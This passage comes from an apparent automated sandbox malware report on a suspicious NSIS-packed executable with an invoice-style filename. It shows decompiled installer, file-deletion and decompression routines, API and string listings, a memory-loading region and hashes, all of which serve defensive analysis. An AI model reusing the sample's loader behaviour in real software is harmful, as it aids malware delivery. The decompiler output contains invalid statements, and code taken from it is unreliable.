									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32 ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

SeShutdownPrivilege, xrefs: 00403553
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
NCRC, xrefs: 00403311
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 00403299, 0040329F, 004033B5
\Temp, xrefs: 0040337F
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
_?=, xrefs: 004033BF
Error launching installer, xrefs: 004033CE
NSIS Error, xrefs: 00403284
1033, xrefs: 00403393
C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe, xrefs: 004034BA
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
~nsu.tmp, xrefs: 0040343C
/D=, xrefs: 00403327
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 0040346F
", xrefs: 004032F3

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-4060684658
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004053b5
0x004053b9
0x004053c2
0x004053c5
0x004053c8
0x004053d0
0x004053d2
0x004053d3
0x00000000
0x004053d3
0x004053e2
0x004053e2
0x004053e5
0x004053e8
0x004053fc
0x00405403
0x00405408
0x0040540a
0x0040541a
0x0040540c
0x00405412
0x00405412
0x0040541f
0x00405422
0x0040542d
0x00405433
0x00405438
0x00405448
0x0040544a
0x00405450
0x00405453
0x00405456
0x00405513
0x00405513
0x00405517
0x00405519
0x00405519
0x00405519
0x00405519
0x00000000
0x00000000
0x00000000
0x00000000
0x0040545c
0x0040545c
0x00405465
0x0040546b
0x00405470
0x00405473
0x00405475
0x00405479
0x0040547b
0x0040547b
0x00405479
0x0040547e
0x00405481
0x00405494
0x00405496
0x0040549b
0x004054a2
0x004054ba
0x004054c0
0x004054c6
0x004054c8
0x004054ed
0x004054ca
0x004054ca
0x004054ce
0x004054e2
0x004054d0
0x004054d3
0x004054d8
0x004054da
0x004054db
0x004054db
0x004054ce
0x004054a4
0x004054aa
0x004054ac
0x004054b2
0x004054b2
0x004054ac
0x00000000
0x004054a2
0x00405483
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00000000
0x00000000
0x0040548e
0x00405492
0x00000000
0x00000000
0x00000000
0x004054f2
0x004054fc
0x00405502
0x00405502
0x0040550d
0x00000000
0x0040550d
0x00405424
0x0040542b
0x00000000
0x00000000
0x00000000
0x004053ea
0x004053ea
0x004053ec
0x0040551d
0x00405520
0x00405523
0x00405575
0x00405575
0x00405575
0x00405525
0x00405528
0x00405533
0x00405538
0x0040553a
0x00000000
0x00000000
0x0040553d
0x00405543
0x00405549
0x0040554f
0x00405551
0x00000000
0x0040556d
0x00405553
0x00405557
0x00000000
0x00000000
0x0040555c
0x00405561
0x00405562
0x00000000
0x00405563
0x0040552a
0x0040552a
0x00000000
0x0040552a
0x004053f2
0x004053f6
0x00000000
0x00000000
0x00000000
0x004053f6

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 004053B4
\*.*, xrefs: 0040540C

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-916240050
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70402 Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1AC704DC
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 1AC70506
ReadFile.KERNELBASE(00000000,00000000,1AC70248,?,00000000), ref: 1AC7051D
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 1AC7053F
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1AC7019C,7FDFFF66), ref: 1AC705B2
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1AC705BD
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1AC7019C), ref: 1AC70608

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: 5ca6856ce717e92d9f92070978534fa159eb9971e879f8149991381f8540268e
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: 52618179E00709ABCF50CFF4C894BAEB7B5AF48761F11845AE505EB390EA74AD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
